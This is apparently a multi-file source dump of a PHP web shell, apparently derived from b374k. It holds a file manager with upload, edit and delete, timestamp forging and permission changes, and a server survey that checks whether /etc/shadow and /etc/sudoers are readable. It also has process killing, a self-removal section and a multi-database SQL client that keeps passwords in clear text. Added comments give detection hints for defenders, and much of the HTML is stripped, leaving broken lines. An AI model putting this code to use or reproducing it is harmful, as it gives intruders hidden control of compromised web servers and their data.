301 | sAjax(tText('notexist', 'Object does not exist'));
302 |
303 | if (is_dir($p['fl'] . $p['dl'][$z])){
304 | if (!@recursiveCopy($p['fl'] . $p['dl'][$z], $p['b'] . $fileinfo['basename'] . DS)) $fNames[] = $p['dl'][$z];
305 | } else {
306 | if (!@copy($p['fl'] . $p['dl'][$z], $p['b'] . $fileinfo['basename'])) $fNames[] = $p['dl'][$z];
307 | }
308 | }
309 |
310 | sAjax(hsc(tText('total', 'Total') . ': ' . $total . ' [' . tText('correct', 'correct') . ' ' . ($total - count($fNames)) . ' - ' . tText('failed', 'failed') . ' '. count($fNames) . (count($fNames) == 0 ? '' : ' (' . implode(', ', $fNames) . ')') . ']'));
311 | }
312 | break;
313 | case 'del':
314 | if (!file_exists($p['a']))
315 | sAjax(tText('notexist', 'Object does not exist'));
316 |
317 | sAjax((is_dir($p['a']) ? @delTree($p['a']) : @unlink($p['a'])) ? 'OK' : tText('fail', 'Fail!'));
318 | break;
319 | case 'rdel':
320 | if ($p['dl']){
321 | $fNames = Array();
322 | $total = count($p['dl']);
323 | for ($z = 0; $total > $z; $z++){
324 | if (is_dir($p['fl'] . $p['dl'][$z])){
325 | if (!@delTree($p['fl'] . $p['dl'][$z])) $fNames[] = $p['dl'][$z];
326 | } else {
327 | if (!@unlink($p['fl'] . $p['dl'][$z])) $fNames[] = $p['dl'][$z];
328 | }
329 | }
330 | sAjax(tText('total', 'Total') . ': ' . $total . ' [' . tText('correct', 'correct') . ' ' . ($total - count($fNames)) . ' - ' . tText('failed', 'failed') . ' '. count($fNames) . (count($fNames) == 0 ? '' : ' (' . implode(', ', $fNames) . ')') . ']');
331 | }
332 | break;
333 | case 'dl':
334 | if (!file_exists($p['fl']))
335 | sAjax(tText('notexist', 'Object does not exist'));
336 |
337 | $fileinfo = pathinfo($p['fl']);
338 | header('Content-Type: application/x-' . $fileinfo['extension']);
339 | header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
340 | header('Content-Length: ' . filesize($p['fl']));
341 | readfile($p['fl']);
342 | exit;
343 | break;
344 | case 'edit':
345 | if (file_put_contents($p['a'], $p['fc']))
346 | sAjax(tText('ok', 'Ok!'));
347 |
348 | tText('fail', 'Fail!');
349 | break;
350 | case 'mdate':
351 | if (!@file_exists($p['a']))
352 | sAjax(tText('notexist', 'Object does not exist'));
353 |
354 | if (isset($p['b'])) $time = strtotime($p['b']);
355 | else $time = strtotime($p['y'] . '-' . $p['m'] . '-' . $p['d'] . ' ' . $p['h'] . ':' . $p['i'] . ':' . $p['s']);
356 | sAjax(@touch($p['a'], $time, $time) ? tText('ok', 'Ok!') : tText('fail', 'Fail!'));
357 | break;
358 | case 'mdatec':
359 | if (!@file_exists($p['a']) || !@file_exists($p['b']))
360 | sAjax(tText('notexist', 'Object does not exist'));
361 |
362 | $time = @filemtime($p['b']);
363 | sAjax(@touch($p['a'], $time, $time) ? tText('ok', 'Ok!') : tText('fail', 'Fail!'));
364 | break;
365 | case 'mpers':
366 | if (!file_exists($p['a']))
367 | sAjax(tText('notexist', 'Object does not exist'));
368 |
369 | sAjax(@chmod($p['a'], base_convert($p['b'], 8, 10)) ? 'OK' : tText('fail', 'Fail!'));
370 | break;
371 | case 'ren':
372 | if (!file_exists($p['a']))
373 | sAjax(tText('notexist', 'Object does not exist'));
374 |
375 | sAjax(@rename($p['a'], $p['b']) ? 'OK' : tText('fail', 'Fail!'));
376 | break;
377 | }
378 | } else if (@$p['md'] === 'info'){
379 | if (file_exists($p['t'])){
380 | $sBuff .= '
' . tText('information', 'Information') . ' [' . mLink(tText('goback', 'Go Back'), 'ajaxLoad("me=filemanager&dir=' . rawurlencode(getUpPath($p['t'])) . '")') . ']
381 |
382 | ' . tText('path', 'Path') . ' | ' . hsc($p['t']) . ' |
383 | ' . tText('size', 'Size') . ' | ' . sizecount(filesize($p['t'])) . ' |
384 | ' . tText('md5', 'MD5') . ' | ' . strtoupper(@md5_file($p['t'])) . ' |
385 | ' . tText('sha1', 'SHA1') . ' | ' . strtoupper(@sha1_file($p['t'])) . ' |
386 | ' . tText('ctime', 'Create time') . ' | ' . date($config['datetime'], filectime($p['t'])) . ' |
387 | ' . tText('atime', 'Access time') . ' | ' . date($config['datetime'], fileatime($p['t'])) . ' |
388 | ' . tText('mtime', 'Modify time') . ' | ' . date($config['datetime'], filemtime($p['t'])) . ' |
';
389 |
390 | if (!$isWIN){
391 | $ow = posix_getpwuid(fileowner($p['t']));
392 | $gr = posix_getgrgid(filegroup($p['t']));
393 | $sBuff .= '' . tText('chmodchown', 'Chmod/Chown') . ' | ' .
394 | ($ow['name'] ? $ow['name'] : fileowner($p['t'])) . '/' . ($gr['name'] ? $gr['name'] : filegroup($p['t'])) .
395 | ' |
' . tText('perms', 'Perms') . ' | ' . vPermsColor($p['t']) . ' |
';
396 | }
397 | $sBuff .= '
';
398 |
399 | $fp = @fopen($p['t'], 'rb');
400 | if ($fp){
401 | $sBuff .= '
402 | [' . mLink(tText('hl', 'Highlight'), 'ajaxLoad("me=filemanager&md=info&hl=n&t=" + euc(dpath(this, false)))') . ']
403 | [' . mLink(tText('hlp', 'Highlight +'), 'ajaxLoad("me=filemanager&md=info&hl=p&t=" + euc(dpath(this, false)))') . ']
404 | [' . mLink(tText('hd', 'Hexdump'), 'ajaxLoad("me=filemanager&md=info&hd=n&t=" + euc(dpath(this, false)))') . ']
405 | [' . mLink(tText('hdp', 'Hexdump preview'), 'ajaxLoad("me=filemanager&md=info&hd=p&t=" + euc(dpath(this, false)))') . ']
406 | [' . mLink(tText('edit', 'Edit'), 'ajaxLoad("me=filemanager&md=edit&t=" + euc(dpath(this, false)))') . ']
407 |
';
408 |
409 | if (isset($p['hd'])){
410 | if ($p['hd'] === 'n'){
411 | $sBuff .= '
Hex Dump';
412 | $str = fread($fp, filesize($p['t']));
413 | } else {
414 | $sBuff .= '
Hex Dump Preview';
415 | $str = fread($fp, $config['hd_lines'] * $config['hd_rows']);
416 | }
417 |
418 | $show_offset = '00000000
';
419 | $show_hex = '';
420 | $show_sBuff = '';
421 | $counter = 0;
422 | $str_len = strlen($str);
423 | for ($i = 0; $i < $str_len; $i++){
424 | $counter++;
425 | $show_hex .= sprintf('%02X', ord($str[$i])) . ' ';
426 | switch (ord($str[$i])){
427 | case 0 :
428 | case 9 :
429 | case 10:
430 | case 13:
431 | case 32: $show_sBuff .= ' ';
432 | break;
433 | default: $show_sBuff .= $str[$i];
434 | }
435 | if ($counter === $config['hd_rows']){
436 | $counter = 0;
437 | if ($i + 1 < $str_len)
438 | $show_offset .= sprintf('%08X', $i + 1) . '
';
439 | $show_hex .= '
';
440 | $show_sBuff .= "\n";
441 | }
442 | }
443 | $sBuff .= '
' . $show_offset . ' | ' . $show_hex . ' | ' . hsc($show_sBuff) . ' |
';
444 | } else if (isset($p['hl'])){
445 | if (function_exists('highlight_file')){
446 | if ($p['hl'] === 'n'){
447 | $sBuff .= '
Highlight:' .
448 | '
' . highlight_file($p['t'], true) . '
';
449 | } else {
450 | $code = substr(highlight_file($p['t'], true), 36, -15);
451 | //if (substr_count($code, '
') > substr_count($code, "\n"))
452 | $lines = explode('
', $code);
453 | $pl = strlen(count($lines));
454 | $sBuff .= '
Highlight +:';
455 |
456 | foreach($lines as $i => $line){
457 | $sBuff .= sprintf('%s | %s
', str_pad($i + 1, $pl, '0', STR_PAD_LEFT), $line);
458 | }
459 |
460 | $sBuff .= '
';
461 | }
462 | } else
463 | $sBuff .= sDialog(tText('hlerror', 'highlight_file() dont exist!'));
464 | } else {
465 | $str = @fread($fp, filesize($p['t']));
466 | $sBuff .= '
File:' .
467 | '
';
468 | }
469 | }
470 | } else
471 | $sBuff .= sDialog(tText('accessdenied', 'Access denied'));
472 |
473 | @fclose($fp);
474 | } else if (@$p['md'] === 'edit'){
475 | if (file_exists($p['t'])){
476 | $filemtime = explode('-', @date('Y-m-d-H-i-s', filemtime($p['t'])));
477 | $sBuff .= '
' . tText('edit', 'Edit') . ' [' . mLink(tText('goback', 'Go Back'), 'ajaxLoad("me=filemanager&dir=' . rawurlencode(getUpPath($p['t'])) . '")') . ']
478 |
485 |
';
499 |
500 | $fp = @fopen($p['t'], 'r');
501 | if ($fp) {
502 | $sBuff .= '
';
514 | }
515 | @fclose($fp);
516 | }
517 | } else {
518 | if (isset($p['ac']) && $p['ac'] === 'up')
519 | $sBuff .= sDialog(@copy($_FILES['upf']['tmp_name'], $p['dir'] . DS . $_FILES['upf']['name']) ? tText('upload', 'Upload') . ' ' . tText('ok', 'Ok!') : tText('fail', 'Fail!'));
520 |
521 | $currentdir = $shelldir;
522 | if (!empty($p['dir'])){
523 | $p['dir'] = fixRoute($p['dir']);
524 | if (substr($p['dir'], -1) !== DS) $p['dir'] = $p['dir'] . DS;
525 | $currentdir = $p['dir'];
526 | }
527 |
528 | $sBuff .= '
' . mHide('base', $currentdir);
665 | } else
666 | $sBuff .= sDialog(tText('accessdenied', 'Access denied'));
667 |
668 | if ($config['FMLimit'])
669 | $sBuff .= genPaginator($p['pg'], ($c < $config['FMLimit'] ? $p['pg'] : -1));
670 | }
--------------------------------------------------------------------------------
/builder/sections/info.php:
--------------------------------------------------------------------------------
1 | ' . mHide('me', 'info') . '
22 |
' . tText('info', 'Info') . '
23 |
' . tText('in0', 'PHP config param (ex: magic_quotes_gpc)') . '
24 | ' . mInput('pvn', '') . ' ' . mSubmit(tText('go', 'Go!'), 'uiupdate(0)', '', 'style="width: 5px;display: inline;"') . '
25 | ';
26 |
27 | // summary
28 | $dis_func = get_cfg_var('disable_functions');
29 | !$dis_func && $dis_func = 'No';
30 |
31 | $sBuff .= "
Resume
" .
32 | "
";
33 | $info = array(
34 | 'Server Time' => date('Y/m/d h:i:s', time()),
35 | 'Server Domain' => $_SERVER['SERVER_NAME'],
36 | 'Server IP' => gethostbyname($_SERVER['SERVER_NAME']),
37 | 'Server OS' => PHP_OS,
38 | 'Server OS Charset' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],
39 | 'Server Software' => $_SERVER['SERVER_SOFTWARE'],
40 | 'Server Web Port' => $_SERVER['SERVER_PORT'],
41 | 'PHP run mode' => php_sapi_name(),
42 | 'This file path' => __file__,
43 | 'PHP Version' => PHP_VERSION,
44 | 'PHP Info' => ((function_exists('phpinfo') && @! in_array('phpinfo', $dis_func)) ? 'Yes' : 'No'),
45 | 'Safe Mode' => getcfg('safe_mode'),
46 | 'Administrator' => (isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from')),
47 | 'allow_url_fopen' => getcfg('allow_url_fopen'),
48 | 'enable_dl' => getcfg('enable_dl'),
49 | 'display_errors' => getcfg('display_errors'),
50 | 'register_globals' => getcfg('register_globals'),
51 | 'magic_quotes_gpc' => getcfg('magic_quotes_gpc'),
52 | 'memory_limit' => getcfg('memory_limit'),
53 | 'post_max_size' => getcfg('post_max_size'),
54 | 'upload_max_filesize' => (getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'),
55 | 'max_execution_time' => getcfg('max_execution_time') . ' second(s)',
56 | 'disable_functions' => $dis_func,
57 | 'MySQL' => getfun('mysql_connect'),
58 | 'MSSQL' => getfun('mssql_connect'),
59 | 'PostgreSQL' => getfun('pg_connect'),
60 | 'Oracle' => getfun('ocilogon'),
61 | 'Curl' => getfun('curl_version'),
62 | 'gzcompress' => getfun('gzcompress'),
63 | 'gzencode' => getfun('gzencode'),
64 | 'bzcompress' => getfun('bzcompress')
65 | );
66 |
67 | foreach ($info as $v => $k)
68 | $sBuff .= "{$v} | {$k} |
";
69 |
70 | $sBuff .= "
";
71 |
72 | //server misc info - based on b374k
73 | $sBuff .= "
Server Info
" .
74 | "
";
75 | if ($isWIN){
76 | foreach (range("A", "Z") as $letter){
77 | if(is_readable($letter.":\\")){
78 | $drive = $letter.":";
79 | $sBuff .= "drive {$drive} | " . sizecount(@disk_free_space($drive)) . " free of " . sizecount(@disk_total_space($drive)) . " |
";
80 | }
81 | }
82 | } else
83 | $sBuff .= "root partition | " . sizecount(@disk_free_space("/")) . " free of " . sizecount(@disk_total_space("/")) . " |
";
84 |
85 | $sBuff .= "PHP | " . phpversion() . " |
";
// Tool inventory: maps a display label to a version command, runs each through execute() (defined
// elsewhere) and appends label and output to $sBuff.
// Review note for defenders: this produces a short burst of interpreter/compiler version probes
// (python, perl, ruby, node, nodejs, gcc, java, javac) spawned by the web-server account, which is
// unusual for a normal PHP application and worth alerting on.
// The "python" key appears twice in this sample; the second entry simply overwrites the first.
86 | $access = array(
87 | "python"=>"python -V",
88 | "perl"=>"perl -e \"print \$]\"",
89 | "python"=>"python -V",
90 | "ruby"=>"ruby -v",
91 | "node"=>"node -v",
92 | "nodejs"=>"nodejs -v",
93 | "gcc"=>"gcc -dumpversion",
94 | "java"=>"java -version",
95 | "javac"=>"javac -version"
96 | );
97 |
98 | foreach($access as $k => $v){
99 | $v = execute($v); // $v now holds the command output instead of the command
100 | if (!$v) $v = "?"; // empty output is shown as unknown
101 |
102 | $sBuff .= "{$k} | {$v} |
";
103 | }
104 |
// Readable-file survey (non-Windows only): tests a fixed list of system and service configuration
// paths and reports the ones the PHP process can read. Only is_file()/is_readable() are called here;
// the file contents are not read in this block.
// Review note for defenders: the web-server account should not be able to read /etc/shadow or
// /etc/sudoers at all; file-access auditing on these paths for that account is a useful detection.
// The entry " /etc/apache2/apache2.conf" carries a leading space in this sample, a stable string
// artifact for signatures.
105 | if(!$isWIN){
106 | $interesting = array(
107 | "/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases",
108 | "/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf",
109 | "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
110 | "/etc/ssh/sshd_config",
111 | "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", " /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
112 | "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
113 | "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules"
114 | );
115 | foreach($interesting as $f){
116 | if (@is_file($f) && @is_readable($f)) // errors suppressed, so open_basedir or permission warnings stay out of the output
117 | $sBuff .= "{$f} | {$f} is readable |
";
118 | }
119 | }
120 | $sBuff .= "
";
121 |
122 |
123 | // cpu info
124 | if(!$isWIN){
125 | if ($i_buff=trim(read_file("/proc/cpuinfo"))){
126 | $sBuff .= "
CPU Info
" .
127 | "
";
128 | $i_buffs = explode("\n\n", $i_buff);
129 | foreach($i_buffs as $i_buffss){
130 | $i_buffss = trim($i_buffss);
131 | if($i_buffss!=""){
132 | $i_buffsss = explode("\n", $i_buffss);
133 | $sBuff .= "
";
134 | foreach($i_buffsss as $i){
135 | $i = trim($i);
136 | if($i!=""){
137 | $ii = explode(":",$i);
138 | if(count($ii)==2) $sBuff .= "{$ii[0]} | {$ii[1]} |
";
139 | }
140 | }
141 | $sBuff .= "
";
142 | }
143 | }
144 | $sBuff .= "
";
145 | }
146 |
147 | // mem info
148 | if ($i_buff=trim(read_file("/proc/meminfo"))){
149 | $sBuff .= "
Memory Info
" .
150 | "
";
151 | $i_buffs = explode("\n", $i_buff);
152 | foreach($i_buffs as $i){
153 | $i = trim($i);
154 | if($i!=""){
155 | $ii = explode(":", $i);
156 | if(count($ii)==2) $sBuff .= "{$ii[0]} | {$ii[1]} |
";
157 | } else
158 | $sBuff .= "
";
159 | }
160 | $sBuff .= "
";
161 | }
162 |
163 | // partition
164 | if ($i_buff=trim(read_file("/proc/partitions"))){
165 | $sBuff .= "
Partitions Info
" .
166 | "
" .
167 | "
";
168 | $i_buff = preg_replace("/\ +/", " ", $i_buff);
169 | $i_buffs = explode("\n\n", $i_buff);
170 | $i_head = explode(" ", $i_buffs[0]);
171 | foreach($i_head as $h)
172 | $sBuff .= "{$h} | ";
173 | $sBuff .= "
";
174 | $i_buffss = explode("\n", $i_buffs[1]);
175 | foreach($i_buffss as $i_b){
176 | $i_row = explode(" ", trim($i_b));
177 | $sBuff .= "";
178 | foreach($i_row as $r)
179 | $sBuff .= "{$r} | ";
180 | $sBuff .= "
";
181 | }
182 | $sBuff .= "
";
183 | }
184 | }
185 |
186 | $phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP Variables" => INFO_VARIABLES);
187 | foreach($phpinfo as $p=>$i){
188 | $sBuff .= "
{$p}
";
189 | ob_start();
190 | eval("phpinfo($i);");
191 | $b = ob_get_contents();
192 | ob_end_clean();
193 | if (preg_match("/(.*?)<\/body>/is", $b, $r)){
194 | $body = str_replace(array(',', ';', '&'), array(', ', '; ', '&'), $r[1]);
195 | $body = str_replace('
(.*?)<\/tr>/", "", $body);
197 | $body = preg_replace("//", '', $body);
198 | $body = preg_replace("//", '', $body);
199 | $sBuff .= "{$body}
";
200 | }
201 | }
--------------------------------------------------------------------------------
/builder/sections/process.php:
--------------------------------------------------------------------------------
1 | $i; $i++){
5 | if (function_exists('posix_kill'))
6 | $tmp .= (posix_kill($p['ps'][$i], '9') ? 'Process with pid ' . $p['ps'][$i] . ' has been successfully killed' : 'Unable to kill process with pid ' . $p['ps'][$i]) . '
';
7 | else {
8 | if($isWIN) $tmp .= execute("taskkill /F /PID {$p['ps'][$i]}") . '
';
9 | else $tmp .= execute("kill -9 {$p['ps'][$i]}") . '
';
10 | }
11 | }
12 |
13 | $sBuff .= sDialog($tmp);
14 | }
15 |
16 | $h = 'ps aux';
17 | $wexp = ' ';
18 | if ($isWIN){
19 | $h = 'tasklist /V /FO csv';
20 | $wexp = '","';
21 | }
22 |
23 | $res = execute($h);
24 | if (trim($res) === '') $sBuff = sDialog('Error getting process list');
25 | else {
26 | if(!$isWIN) $res = preg_replace('#\ +#', ' ', $res);
27 | $psarr = explode("\n", $res);
28 | $h = true;
29 | $tblcount = 0;
30 | $wcount = count(explode($wexp, $psarr[0]));
31 |
32 | $sBuff .= '
';
68 | }
--------------------------------------------------------------------------------
/builder/sections/selfremove.php:
--------------------------------------------------------------------------------
1 | ' . tText('fail', 'Fail!') . '
';
8 | }
9 |
10 | $r = mt_rand(1337, 9999);
11 | $sBuff .= '';
--------------------------------------------------------------------------------
/builder/sections/sql.js:
--------------------------------------------------------------------------------
// dbexec: submit the first form of the page plus a `code` parameter and show the reply in #dbRes.
// c - the SQL text to send; it is appended as-is, so the caller is expected to have URL-encoded it.
// Relies on the helpers empty(), append(), ajax(), serialize() and uiUpdateControls(), and on `d`
// (presumably an alias of document), all defined outside this file.
1 | function dbexec(c){
2 | empty("dbRes");
3 | append("dbRes", "");
4 | ajax(serialize(d.forms[0]) + '&code=' + c, function(r){
5 | empty("dbRes");
6 | append("dbRes", r); // r is the server reply; presumably inserted as markup - confirm in append()
7 | uiUpdateControls();
8 | });
9 | }
10 |
// dbengine: adapt the connection form to the selected database type.
// t - the control whose .value holds the selected type.
// Hides the elements "su", "sp" and "so" first, then relabels "sh" and re-shows the ones the
// chosen backend uses: odbc/pdo show su and sp, sqlite/sqlite3 show none, everything else all three.
11 | function dbengine(t){
12 | d.getElementById("su").className = "hide";
13 | d.getElementById("sp").className = "hide";
14 | d.getElementById("so").className = "hide";
15 |
16 | if ((t.value === "odbc") || (t.value === "pdo")){
17 | d.getElementById("sh").innerHTML = "DSN/Connection String";
18 | d.getElementById("su").className = "";
19 | d.getElementById("sp").className = "";
20 | } else if ((t.value === "sqlite") || (t.value === "sqlite3")){
21 | d.getElementById("sh").innerHTML = "DB File";
22 | } else {
23 | d.getElementById("sh").innerHTML = "Host";
24 | d.getElementById("su").className = "";
25 | d.getElementById("sp").className = "";
26 | d.getElementById("so").className = "";
27 | }
28 | }
29 |
// dbhistory: keep and display the list of database connections used in this browser tab.
// a - "s" saves the current form values; any other value renders the saved entries.
// The list lives in sessionStorage under the key config.consNames.sqlclog as JSON {history: [...]}.
// Review notes: each entry includes the database password in clear text, and the render branch
// concatenates host, port, user and pass into a query string without encoding. o, s, i and u are
// assigned without a declaration and therefore become globals.
30 | function dbhistory(a){
31 | if (a == "s"){
32 | o = {history: []};
33 | if (sessionStorage.getItem( config.consNames.sqlclog ) != null)
34 | o = JSON.parse(sessionStorage.getItem( config.consNames.sqlclog ));
35 |
36 | o.history.push({"type": d.getElementById("type").value, "host": d.getElementById("host").value,
37 | "port": d.getElementById("port").value, "user": d.getElementById("user").value, "pass": d.getElementById("pass").value});
38 | sessionStorage.setItem( config.consNames.sqlclog , JSON.stringify(o));
39 | } else if (sessionStorage.getItem( config.consNames.sqlclog ) != null) {
40 | s = "";
41 | o = JSON.parse(sessionStorage.getItem( config.consNames.sqlclog ));
42 | for (i = 0; i < o.history.length; i++){
43 | u = "me=sql&host=" + o.history[i].host + "&port=" + o.history[i].port + "&user=" + o.history[i].user + "&pass=" + o.history[i].pass + "&type=" + o.history[i].type;
44 | s += "[" + o.history[i].type.toUpperCase() + "] " + o.history[i].user + "@" + o.history[i].host + "' . tText('go', 'Go!') . '
";
45 | }
46 |
47 | if (s != "") prepend("content", "" + s + "
");
48 | }//TODO add delete a entry
49 | }
--------------------------------------------------------------------------------
/builder/sections/sql.php:
--------------------------------------------------------------------------------
1 | $user, 'PWD'=>$pass);
14 | return @sqlsrv_connect($host,$coninfo);
15 | }
16 | } else if($type === 'pgsql'){
17 | $hosts = explode(':', $host);
18 | if(count($hosts)==2) $host_str = 'host='.$hosts[0].' port='.$hosts[1];
19 | else $host_str = 'host='.$host;
20 | if(function_exists('pg_connect')) return @pg_connect($host_str.' user='.$user.' password='.$pass);
21 | } else if($type === 'oracle'){
22 | if(function_exists('oci_connect')) return @oci_connect($user, $pass, $host);
23 | } else if($type === 'sqlite3'){
24 | if(class_exists('SQLite3')) if(!empty($host)) return new SQLite3($host);
25 | } else if($type === 'sqlite'){
26 | if(function_exists('sqlite_open')) return @sqlite_open($host);
27 | } else if($type === 'odbc'){
28 | if(function_exists('odbc_connect')) return @odbc_connect($host, $user, $pass);
29 | } else if($type === 'pdo'){
30 | if(class_exists('PDO')) if(!empty($host)) return new PDO($host, $user, $pass);
31 | }
32 | return false;
33 | }
34 |
// sql_query: run $query through the driver that matches $type and return that driver's result.
// $type  - backend key: mysql, mssql, pgsql, oracle, sqlite3, sqlite, odbc or pdo.
// $query - SQL text, handed to the driver as-is (no parameter binding happens here).
// $con   - connection handle or object for the backend.
// Falls off the end (null) for an unknown $type, or when neither mysql nor mssql function variant exists.
35 | function sql_query($type, $query, $con){
36 | if ($type === 'mysql'){
37 | if(function_exists('mysqli_query')) return mysqli_query($con,$query);
38 | else if(function_exists('mysql_query')) return mysql_query($query); // $con is not passed on this path
39 | } else if($type === 'mssql'){
40 | if(function_exists('mssql_query')) return mssql_query($query); // $con is not passed on this path
41 | else if(function_exists('sqlsrv_query')) return sqlsrv_query($con,$query);
42 | } else if($type === 'pgsql') return pg_query($query); // $con is not passed on this path
43 | else if($type === 'oracle') return oci_execute(oci_parse($con, $query)); // returns oci_execute()'s result, not the parsed statement
44 | else if($type === 'sqlite3') return $con->query($query);
45 | else if($type === 'sqlite') return sqlite_query($con, $query);
46 | else if($type === 'odbc') return odbc_exec($con, $query);
47 | else if($type === 'pdo') return $con->query($query);
48 | }
49 |
// sql_num_fields: return the number of columns in a query result for the given backend.
// $type   - backend key (same set as sql_query).
// $result - result returned by sql_query().
// $con    - connection; only the mysqli path uses it (mysqli_field_count works on the connection).
// Falls off the end (null) for an unknown $type, or when neither mysql nor mssql function variant exists.
50 | function sql_num_fields($type, $result, $con){
51 | if ($type === 'mysql'){
52 | if(function_exists('mysqli_field_count')) return mysqli_field_count($con);
53 | else if (function_exists('mysql_num_fields')) return mysql_num_fields($result);
54 | } else if($type === 'mssql'){
55 | if(function_exists('mssql_num_fields')) return mssql_num_fields($result);
56 | else if(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($result);
57 | } else if($type === 'pgsql') return pg_num_fields($result);
58 | else if($type === 'oracle') return oci_num_fields($result);
59 | else if($type === 'sqlite3') return $result->numColumns();
60 | else if($type === 'sqlite') return sqlite_num_fields($result);
61 | else if($type === 'odbc') return odbc_num_fields($result);
62 | else if($type === 'pdo') return $result->columnCount();
63 | }
64 |
// sql_field_name: return the name of column $i of a query result for the given backend.
// $type   - backend key (same set as sql_query).
// $result - result returned by sql_query().
// $i      - zero-based column index as used by the caller; the oracle and odbc paths pass $i + 1.
// Falls off the end (null) for an unknown $type or when the metadata lookup does not yield an array.
65 | function sql_field_name($type,$result,$i){
66 | if ($type === 'mysql'){
67 | if(function_exists('mysqli_fetch_fields')){
68 | $metadata = mysqli_fetch_fields($result); // fetches metadata for all columns on every call
69 | if(is_array($metadata)) return $metadata[$i]->name;
70 | } else if (function_exists('mysql_field_name')) return mysql_field_name($result,$i);
71 | } else if($type === 'mssql'){
72 | if(function_exists('mssql_field_name')) return mssql_field_name($result,$i);
73 | else if(function_exists('sqlsrv_field_metadata')){
74 | $metadata = sqlsrv_field_metadata($result);
75 | if(is_array($metadata)) return $metadata[$i]['Name'];
76 | }
77 | } else if($type === 'pgsql') return pg_field_name($result,$i);
78 | else if($type === 'oracle') return oci_field_name($result,$i+1);
79 | else if($type === 'sqlite3') return $result->columnName($i);
80 | else if($type === 'sqlite') return sqlite_field_name($result,$i);
81 | else if($type === 'odbc') return odbc_field_name($result,$i+1);
82 | else if($type === 'pdo'){
83 | $res = $result->getColumnMeta($i);
84 | return $res['name'];
85 | }
86 | }
87 |
// sql_fetch_data: fetch the next row of a query result for the given backend.
// $type   - backend key (same set as sql_query).
// $result - result returned by sql_query().
// Returns whatever the driver returns for one row; the caller loops until the value is falsy.
// NOTE(review): the literal mode arguments (1 for sqlsrv/sqlite3/sqlite, 2 for pdo) presumably select
// the row-array style of each driver; the row shape therefore differs between backends - confirm.
88 | function sql_fetch_data($type,$result){
89 | if ($type === 'mysql'){
90 | if(function_exists('mysqli_fetch_row')) return mysqli_fetch_row($result);
91 | else if(function_exists('mysql_fetch_row')) return mysql_fetch_row($result);
92 | } else if($type === 'mssql'){
93 | if(function_exists('mssql_fetch_row')) return mssql_fetch_row($result);
94 | else if(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($result,1);
95 | } else if($type === 'pgsql') return pg_fetch_row($result);
96 | else if($type === 'oracle') return oci_fetch_row($result);
97 | else if($type === 'sqlite3') return $result->fetchArray(1);
98 | else if($type === 'sqlite') return sqlite_fetch_array($result,1);
99 | else if($type === 'odbc') return odbc_fetch_array($result);
100 | else if($type === 'pdo') return $result->fetch(2);
101 | }
102 |
// sql_num_rows: return the row count of a query result for the given backend.
// $type   - backend key (same set as sql_query).
// $result - result returned by sql_query().
// Falls off the end (null) for an unknown $type, when no mysql/mssql function variant exists, or
// when the sqlite3 path does not get an array back.
103 | function sql_num_rows($type,$result){
104 | if ($type === 'mysql'){
105 | if(function_exists('mysqli_num_rows')) return mysqli_num_rows($result);
106 | else if(function_exists('mysql_num_rows')) return mysql_num_rows($result);
107 | } else if($type === 'mssql'){
108 | if(function_exists('mssql_num_rows')) return mssql_num_rows($result);
109 | else if(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($result);
110 | } else if($type === 'pgsql') return pg_num_rows($result);
111 | else if($type === 'oracle') return oci_num_rows($result);
112 | else if($type === 'sqlite3'){
113 | $metadata = $result->fetchArray(); // reads (and consumes) the next row of $result
114 | if(is_array($metadata)) return $metadata['count']; // only meaningful when the query selected a column named "count"
115 | } else if($type === 'sqlite') return sqlite_num_rows($result);
116 | else if($type === 'odbc') return odbc_num_rows($result);
117 | else if($type === 'pdo') return $result->rowCount();
118 | }
119 |
// sql_close: close the connection $con using the driver that matches $type.
// $type - backend key (same set as sql_query).
// $con  - connection handle or object to close.
// Returns the driver's close result; null for pdo, for an unknown $type, or when no mysql/mssql
// function variant exists.
120 | function sql_close($type,$con){
121 | if ($type === 'mysql'){
122 | if(function_exists('mysqli_close')) return mysqli_close($con);
123 | else if(function_exists('mysql_close')) return mysql_close($con);
124 | } else if($type === 'mssql'){
125 | if(function_exists('mssql_close')) return mssql_close($con);
126 | else if(function_exists('sqlsrv_close')) return sqlsrv_close($con);
127 | } else if($type === 'pgsql') return pg_close($con);
128 | else if($type === 'oracle') return oci_close($con);
129 | else if($type === 'sqlite3') return $con->close();
130 | else if($type === 'sqlite') return sqlite_close($con);
131 | else if($type === 'odbc') return odbc_close($con);
132 | else if($type === 'pdo') return $con = null; // clears only this function's local copy; the caller's variable is untouched
133 | }
134 |
135 | /*
136 | function dump($table){
137 | if (empty($table)) return 0;
138 | $this->dump = array();
139 | $this->dump[0] = '';
140 | $this->dump[1] = '-- --------------------------------------- ';
141 | $this->dump[2] = '-- Created: ' . date("d/m/Y H:i:s");
142 | $this->dump[3] = '-- Database: ' . $this->base;
143 | $this->dump[4] = '-- Table: ' . $table;
144 | $this->dump[5] = '-- --------------------------------------- ';
145 |
146 | switch ($this->db){
147 | case 'MySQL':
148 | $this->dump[0] = '-- MySQL dump';
149 | if ($this->query('SHOW CREATE TABLE `' . $table . '`') != 1) return 0;
150 | if (! $this->get_result()) return 0;
151 | $this->dump[] = $this->rows[0]['Create Table'];
152 | $this->dump[] = '-- ------------------------------------- ';
